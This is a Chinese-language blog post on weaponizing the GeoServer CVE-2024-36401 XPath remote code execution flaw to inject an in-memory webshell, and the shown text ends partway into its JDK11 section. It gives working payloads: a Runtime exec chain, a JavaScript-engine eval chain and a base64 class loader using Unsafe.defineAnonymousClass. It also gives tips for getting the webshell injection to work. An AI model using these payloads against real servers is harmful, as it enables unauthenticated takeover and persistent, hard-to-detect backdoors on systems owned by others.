

<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="robots" content="noodp" />
    <title>GeoServer property RCE注入内存马 - </title><meta name="Description" content="yzddMr6&#39;s Blog"><meta property="og:title" content="GeoServer property RCE注入内存马" />
<meta property="og:description" content="1 背景GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。 在GeoServ" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://yzddmr6.com/posts/geoserver-memoryshell/" /><meta property="og:image" content="https://yzddmr6.com/images/avatar.webp"/><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2024-07-04T20:54:33+08:00" />
<meta property="article:modified_time" content="2024-07-04T20:54:33+08:00" /><meta property="og:site_name" content="Hugo DoIt Theme Documentation" />
<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://yzddmr6.com/images/avatar.webp"/>

<meta name="twitter:title" content="GeoServer property RCE注入内存马"/>
<meta name="twitter:description" content="1 背景GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。 在GeoServ"/>
<meta name="application-name" content="yzddMr6&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="yzddMr6&#39;s Blog">

<meta name="theme-color" content="#f8f8f8"><meta name="msapplication-TileColor" content="#da532c"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"><link rel="canonical" href="https://yzddmr6.com/posts/geoserver-memoryshell/" /><link rel="prev" href="https://yzddmr6.com/posts/old-phone-for-game/" /><link rel="next" href="https://yzddmr6.com/posts/gzh/" />
<link rel="stylesheet" href="/css/main.css"><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/color.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="/lib/fontawesome-free/all.min.css">
        <noscript><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"></noscript><link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="/lib/animate/animate.min.css">
        <noscript><link rel="stylesheet" href="/lib/animate/animate.min.css"></noscript><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "GeoServer property RCE注入内存马",
        "inLanguage": "zh-CN",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/yzddmr6.com\/posts\/geoserver-memoryshell\/"
        },"genre": "posts","wordcount":  1143 ,
        "url": "https:\/\/yzddmr6.com\/posts\/geoserver-memoryshell\/","datePublished": "2024-07-04T20:54:33+08:00","dateModified": "2024-07-04T20:54:33+08:00","license": "This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.","publisher": {
            "@type": "Organization",
            "name": "xxxx","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/yzddmr6.com\/images\/avatar.webp",
                    "width":  640 ,
                    "height":  640 
                }},"author": {
                "@type": "Person",
                "name": "yzddMr6"
            },"description": ""
    }
    </script><script src="//instant.page/5.2.0" defer type="module" integrity="sha384-jnZyxPjiipYXnSU0ygqeac2q7CVYMbh84q0uHVRRxEtvFPiQYbXWUorga2aqZJ0z"></script>
</head>

<body header-desktop="fixed" header-mobile="auto"><script type="text/javascript">
        function setTheme(theme) {document.body.setAttribute('theme', theme); document.documentElement.style.setProperty('color-scheme', theme === 'light' ? 'light' : 'dark'); window.theme = theme;   window.isDark = window.theme !== 'light' }
        function saveTheme(theme) {window.localStorage && localStorage.setItem('theme', theme);}
        function getMeta(metaName) {const metas = document.getElementsByTagName('meta'); for (let i = 0; i < metas.length; i++) if (metas[i].getAttribute('name') === metaName) return metas[i]; return '';}
        if (window.localStorage && localStorage.getItem('theme')) {let theme = localStorage.getItem('theme');theme === 'light' || theme === 'dark' || theme === 'black' ? setTheme(theme) : (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches ? setTheme('dark') : setTheme('light')); } else { if ('auto' === 'light' || 'auto' === 'dark' || 'auto' === 'black') setTheme('auto'), saveTheme('auto'); else saveTheme('auto'), window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches ? setTheme('dark') : setTheme('light');}
        let metaColors = {'light': '#f8f8f8','dark': '#252627','black': '#000000'}
        getMeta('theme-color').content = metaColors[document.body.getAttribute('theme')];
        window.switchThemeEventSet = new Set()
    </script>
    <div id="back-to-top"></div>
    <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="">yzddMr6&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/"> 所有文章 </a><a class="menu-item" href="/tags/"> 标签 </a><a class="menu-item" href="/categories/"> 分类 </a><a class="menu-item" href="/showcase/"> 会议演讲 </a><a class="menu-item" href="/about/"> 关于 </a><a class="menu-item" href="https://github.com/yzddmr6" title="GitHub" rel="noopener noreferrer" target="_blank"><i class='fab fa-github fa-fw'></i>  </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="搜索文章标题或内容..." id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-select" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                    <select class="color-theme-select" id="theme-select-desktop" title="切换主题">
                        <option value="light">浅色</option>
                        <option value="dark">深色</option>
                        <option value="black">黑色</option>
                        <option value="auto">跟随系统</option>
                    </select>
                </a></div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="">yzddMr6&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="搜索文章标题或内容..." id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="">所有文章</a><a class="menu-item" href="/tags/" title="">标签</a><a class="menu-item" href="/categories/" title="">分类</a><a class="menu-item" href="/showcase/" title="">会议演讲</a><a class="menu-item" href="/about/" title="">关于</a><a class="menu-item" href="https://github.com/yzddmr6" title="GitHub" rel="noopener noreferrer" target="_blank"><i class='fab fa-github fa-fw'></i></a><a href="javascript:void(0);" class="menu-item theme-select" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
                <select class="color-theme-select" id="theme-select-mobile" title="切换主题">
                    <option value="light">浅色</option>
                    <option value="dark">深色</option>
                    <option value="black">黑色</option>
                    <option value="auto">跟随系统</option>
                </select>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
            <div class="container"><div class="toc" id="toc-auto">
        <h2 class="toc-title">目录</h2>
        <div class="toc-content" id="toc-content-auto"><nav id="TableOfContents">
  <ul>
    <li><a href="#背景">背景</a></li>
    <li><a href="#注入内存马">注入内存马</a>
      <ul>
        <li><a href="#无法使用函数">无法使用函数</a></li>
        <li><a href="#jdk11下的defineanonymousclass">JDK11下的defineAnonymousClass</a></li>
      </ul>
    </li>
  </ul>
</nav></div>
    </div><script>document.getElementsByTagName("main")[0].setAttribute("autoTOC", "true")</script><article class="page single"><h1 class="single-title animate__animated animate__flipInX">GeoServer property RCE注入内存马</h1><div class="post-meta">
            <div class="post-meta-line">
                <span class="post-author"><span class="author fas fa-user-circle fa-fw"></span><a href="https://github.com/yzddmr6" title="Author" target="_blank" rel="noopener noreferrer author" class="author">yzddMr6</a>
                </span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2024-07-04">2024-07-04</time>&nbsp;<i class="far fa-edit fa-fw"></i>&nbsp;<time datetime="2024-07-04">2024-07-04</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 1143 字&nbsp;<i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 3 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#背景">背景</a></li>
    <li><a href="#注入内存马">注入内存马</a>
      <ul>
        <li><a href="#无法使用函数">无法使用函数</a></li>
        <li><a href="#jdk11下的defineanonymousclass">JDK11下的defineAnonymousClass</a></li>
      </ul>
    </li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><meta name="referrer" content="no-referrer" />
<h2 id="背景" class="headerLink">
    <a href="#%e8%83%8c%e6%99%af" class="header-mark"></a>1 背景</h2><p>GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。
在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。
from <a href="https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/" target="_blank" rel="noopener noreferrer">https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/</a>
本文主要研究如何武器化利用，注入内存马。</p>
<h2 id="注入内存马" class="headerLink">
    <a href="#%e6%b3%a8%e5%85%a5%e5%86%85%e5%ad%98%e9%a9%ac" class="header-mark"></a>2 注入内存马</h2><p>目前市面上公开的POC主要是做到了命令执行：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">exec(java.lang.Runtime.getRuntime(),&#39;touch /tmp/success2&#39;)
</span></span></code></pre></td></tr></table>
</div>
</div><p>Apache XPath解析表达式是支持链式调用的，是非常常见的一个表达式注入场景。虽然也可以用ClassPathXmlApplicationContext或者JNDI这种远程加载的方式去加载类，但是总归是有限制，不优雅。可以参考我之前在Kcon上讲过的议题《Java表达式攻防下的黑魔法》，可以利用Js引擎将这类链式调用的命令执行转化为完全体的任意代码执行，并且无需出网，无需额外依赖
Y4tacker也在之前的文章中提到了怎么构造Js引擎的Poc：<a href="https://tttang.com/archive/1771/" target="_blank" rel="noopener noreferrer">https://tttang.com/archive/1771/</a></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">eval(getEngineByName(javax.script.ScriptEngineManager.new(),&#39;js&#39;),&#39;java.lang.Runtime.getRuntime().exec(&#34;open -na Calculator&#34;)&#39;)
</span></span></code></pre></td></tr></table>
</div>
</div><p>那么似乎我们只需要把Js执行的Payload换成我之前议题中给出的Payload即可：
<a href="https://github.com/yzddmr6/Java-Js-Engine-Payloads" target="_blank" rel="noopener noreferrer">https://github.com/yzddmr6/Java-Js-Engine-Payloads</a>
但是实际上实现的时候有两个坑</p>
<h3 id="无法使用函数" class="headerLink">
    <a href="#%e6%97%a0%e6%b3%95%e4%bd%bf%e7%94%a8%e5%87%bd%e6%95%b0" class="header-mark"></a>2.1 无法使用函数</h3><p>首先利用JMG生成内存马注入代码。由于通过bin形式安装默认是Jetty，这里选择Jetty类型
<figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079658441-b9c174e6-6745-4495-879b-2af5e7ddad4c.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=ub3a612ca&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1182499&amp;status=done&amp;style=none&amp;taskId=ub8f1e3c7-eedb-4188-aa90-cf588213d10&amp;title=&amp;width=893" title="image.png" data-thumbnail="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079658441-b9c174e6-6745-4495-879b-2af5e7ddad4c.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=ub3a612ca&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1182499&amp;status=done&amp;style=none&amp;taskId=ub8f1e3c7-eedb-4188-aa90-cf588213d10&amp;title=&amp;width=893">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079658441-b9c174e6-6745-4495-879b-2af5e7ddad4c.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=ub3a612ca&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1182499&amp;status=done&amp;style=none&amp;taskId=ub8f1e3c7-eedb-4188-aa90-cf588213d10&amp;title=&amp;width=893"
            srcset="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079658441-b9c174e6-6745-4495-879b-2af5e7ddad4c.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=ub3a612ca&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1182499&amp;status=done&amp;style=none&amp;taskId=ub8f1e3c7-eedb-4188-aa90-cf588213d10&amp;title=&amp;width=893, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079658441-b9c174e6-6745-4495-879b-2af5e7ddad4c.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=ub3a612ca&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1182499&amp;status=done&amp;style=none&amp;taskId=ub8f1e3c7-eedb-4188-aa90-cf588213d10&amp;title=&amp;width=893 1.5x, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079658441-b9c174e6-6745-4495-879b-2af5e7ddad4c.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=ub3a612ca&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1182499&amp;status=done&amp;style=none&amp;taskId=ub8f1e3c7-eedb-4188-aa90-cf588213d10&amp;title=&amp;width=893 2x"
            sizes="auto"
            alt="image.png">
    </a></figure>
然后将code部分替换</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">function Base64DecodeToByte(str) {
</span></span><span class="line"><span class="cl">    var bt;
</span></span><span class="line"><span class="cl">    try {
</span></span><span class="line"><span class="cl">        bt = java.lang.Class.forName(&#34;sun.misc.BASE64Decoder&#34;).newInstance().decodeBuffer(str);
</span></span><span class="line"><span class="cl">    } catch (e) {
</span></span><span class="line"><span class="cl">        bt = java.util.Base64.getDecoder().decode(str);
</span></span><span class="line"><span class="cl">    }
</span></span><span class="line"><span class="cl">    return bt;
</span></span><span class="line"><span class="cl">}
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">function defineClass(classBytes) {
</span></span><span class="line"><span class="cl">    var theUnsafe = java.lang.Class.forName(&#34;sun.misc.Unsafe&#34;).getDeclaredField(&#34;theUnsafe&#34;);
</span></span><span class="line"><span class="cl">    theUnsafe.setAccessible(true);
</span></span><span class="line"><span class="cl">    unsafe = theUnsafe.get(null);
</span></span><span class="line"><span class="cl">    unsafe.defineAnonymousClass(java.lang.Class.forName(&#34;java.lang.Class&#34;), classBytes, null).newInstance();
</span></span><span class="line"><span class="cl">}
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">defineClass(Base64DecodeToByte(code));
</span></span></code></pre></td></tr></table>
</div>
</div><p>打这个漏洞如果返回java.lang.ClassCastException是正常的，但是出现了下面的报错，说明有问题了。
<figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079785548-10251d8e-21a3-415c-94b3-ea9d4e0fd8e1.png#averageHue=%23f1eeee&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=631&amp;id=u8b054de0&amp;originHeight=1262&amp;originWidth=1242&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=943156&amp;status=done&amp;style=none&amp;taskId=ua5f676a4-123d-4be9-9ed1-b3e80ec4423&amp;title=&amp;width=621" title="image.png" data-thumbnail="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079785548-10251d8e-21a3-415c-94b3-ea9d4e0fd8e1.png#averageHue=%23f1eeee&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=631&amp;id=u8b054de0&amp;originHeight=1262&amp;originWidth=1242&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=943156&amp;status=done&amp;style=none&amp;taskId=ua5f676a4-123d-4be9-9ed1-b3e80ec4423&amp;title=&amp;width=621">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079785548-10251d8e-21a3-415c-94b3-ea9d4e0fd8e1.png#averageHue=%23f1eeee&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=631&amp;id=u8b054de0&amp;originHeight=1262&amp;originWidth=1242&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=943156&amp;status=done&amp;style=none&amp;taskId=ua5f676a4-123d-4be9-9ed1-b3e80ec4423&amp;title=&amp;width=621"
            srcset="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079785548-10251d8e-21a3-415c-94b3-ea9d4e0fd8e1.png#averageHue=%23f1eeee&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=631&amp;id=u8b054de0&amp;originHeight=1262&amp;originWidth=1242&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=943156&amp;status=done&amp;style=none&amp;taskId=ua5f676a4-123d-4be9-9ed1-b3e80ec4423&amp;title=&amp;width=621, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079785548-10251d8e-21a3-415c-94b3-ea9d4e0fd8e1.png#averageHue=%23f1eeee&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=631&amp;id=u8b054de0&amp;originHeight=1262&amp;originWidth=1242&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=943156&amp;status=done&amp;style=none&amp;taskId=ua5f676a4-123d-4be9-9ed1-b3e80ec4423&amp;title=&amp;width=621 1.5x, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720079785548-10251d8e-21a3-415c-94b3-ea9d4e0fd8e1.png#averageHue=%23f1eeee&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=631&amp;id=u8b054de0&amp;originHeight=1262&amp;originWidth=1242&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=943156&amp;status=done&amp;style=none&amp;taskId=ua5f676a4-123d-4be9-9ed1-b3e80ec4423&amp;title=&amp;width=621 2x"
            sizes="auto"
            alt="image.png">
    </a></figure>
经过多次测试，发现这里的Payload不能用function的语法。十分神秘，单独测试Js引擎没有这个问题，暂时没有去深入研究原因。
<figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081272312-7ef5e5fc-438b-45c0-a414-098c26d8b621.png#averageHue=%23f5f2f2&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=618&amp;id=ue466b421&amp;originHeight=1236&amp;originWidth=2470&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1744569&amp;status=done&amp;style=none&amp;taskId=u30217090-8d83-466e-8cfe-9631ab61627&amp;title=&amp;width=1235" title="image.png" data-thumbnail="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081272312-7ef5e5fc-438b-45c0-a414-098c26d8b621.png#averageHue=%23f5f2f2&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=618&amp;id=ue466b421&amp;originHeight=1236&amp;originWidth=2470&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1744569&amp;status=done&amp;style=none&amp;taskId=u30217090-8d83-466e-8cfe-9631ab61627&amp;title=&amp;width=1235">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081272312-7ef5e5fc-438b-45c0-a414-098c26d8b621.png#averageHue=%23f5f2f2&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=618&amp;id=ue466b421&amp;originHeight=1236&amp;originWidth=2470&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1744569&amp;status=done&amp;style=none&amp;taskId=u30217090-8d83-466e-8cfe-9631ab61627&amp;title=&amp;width=1235"
            srcset="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081272312-7ef5e5fc-438b-45c0-a414-098c26d8b621.png#averageHue=%23f5f2f2&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=618&amp;id=ue466b421&amp;originHeight=1236&amp;originWidth=2470&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1744569&amp;status=done&amp;style=none&amp;taskId=u30217090-8d83-466e-8cfe-9631ab61627&amp;title=&amp;width=1235, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081272312-7ef5e5fc-438b-45c0-a414-098c26d8b621.png#averageHue=%23f5f2f2&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=618&amp;id=ue466b421&amp;originHeight=1236&amp;originWidth=2470&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1744569&amp;status=done&amp;style=none&amp;taskId=u30217090-8d83-466e-8cfe-9631ab61627&amp;title=&amp;width=1235 1.5x, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081272312-7ef5e5fc-438b-45c0-a414-098c26d8b621.png#averageHue=%23f5f2f2&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=618&amp;id=ue466b421&amp;originHeight=1236&amp;originWidth=2470&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1744569&amp;status=done&amp;style=none&amp;taskId=u30217090-8d83-466e-8cfe-9631ab61627&amp;title=&amp;width=1235 2x"
            sizes="auto"
            alt="image.png">
    </a></figure></p>
<h3 id="jdk11下的defineanonymousclass" class="headerLink">
    <a href="#jdk11%e4%b8%8b%e7%9a%84defineanonymousclass" class="header-mark"></a>2.2 JDK11下的defineAnonymousClass</h3><p>重新改成不带function的形式，又出现了另外一个报错
<figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081971082-d2272089-ad88-4cec-8a5d-3a0e68c7685a.png#averageHue=%23f6f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=155&amp;id=ud2addb39&amp;originHeight=310&amp;originWidth=2800&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=494235&amp;status=done&amp;style=none&amp;taskId=ua30d6431-089e-4d60-897f-3aa142c8756&amp;title=&amp;width=1400" title="image.png" data-thumbnail="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081971082-d2272089-ad88-4cec-8a5d-3a0e68c7685a.png#averageHue=%23f6f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=155&amp;id=ud2addb39&amp;originHeight=310&amp;originWidth=2800&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=494235&amp;status=done&amp;style=none&amp;taskId=ua30d6431-089e-4d60-897f-3aa142c8756&amp;title=&amp;width=1400">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081971082-d2272089-ad88-4cec-8a5d-3a0e68c7685a.png#averageHue=%23f6f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=155&amp;id=ud2addb39&amp;originHeight=310&amp;originWidth=2800&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=494235&amp;status=done&amp;style=none&amp;taskId=ua30d6431-089e-4d60-897f-3aa142c8756&amp;title=&amp;width=1400"
            srcset="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081971082-d2272089-ad88-4cec-8a5d-3a0e68c7685a.png#averageHue=%23f6f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=155&amp;id=ud2addb39&amp;originHeight=310&amp;originWidth=2800&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=494235&amp;status=done&amp;style=none&amp;taskId=ua30d6431-089e-4d60-897f-3aa142c8756&amp;title=&amp;width=1400, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081971082-d2272089-ad88-4cec-8a5d-3a0e68c7685a.png#averageHue=%23f6f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=155&amp;id=ud2addb39&amp;originHeight=310&amp;originWidth=2800&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=494235&amp;status=done&amp;style=none&amp;taskId=ua30d6431-089e-4d60-897f-3aa142c8756&amp;title=&amp;width=1400 1.5x, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720081971082-d2272089-ad88-4cec-8a5d-3a0e68c7685a.png#averageHue=%23f6f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=155&amp;id=ud2addb39&amp;originHeight=310&amp;originWidth=2800&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=494235&amp;status=done&amp;style=none&amp;taskId=ua30d6431-089e-4d60-897f-3aa142c8756&amp;title=&amp;width=1400 2x"
            sizes="auto"
            alt="image.png">
    </a></figure>
发现原因是JDK&gt;8时，defineAnonymousClass做了限制，被加载的Class要满足两个条件之一：</p>
<ol>
<li>没有包名</li>
<li>包名跟第一个参数Class的包名一致，此处为java.lang，否则会报错</li>
</ol>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084947981-4e5c8150-2590-489c-a06c-adde4f2f7742.png#averageHue=%23f5f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=190&amp;id=Yv755&amp;originHeight=380&amp;originWidth=2798&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=565637&amp;status=done&amp;style=none&amp;taskId=u635a72ee-e93a-4bc4-8e03-ed4c4fb8fb8&amp;title=&amp;width=1399" title="image.png" data-thumbnail="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084947981-4e5c8150-2590-489c-a06c-adde4f2f7742.png#averageHue=%23f5f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=190&amp;id=Yv755&amp;originHeight=380&amp;originWidth=2798&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=565637&amp;status=done&amp;style=none&amp;taskId=u635a72ee-e93a-4bc4-8e03-ed4c4fb8fb8&amp;title=&amp;width=1399">
        <img
            
            loading="lazy"
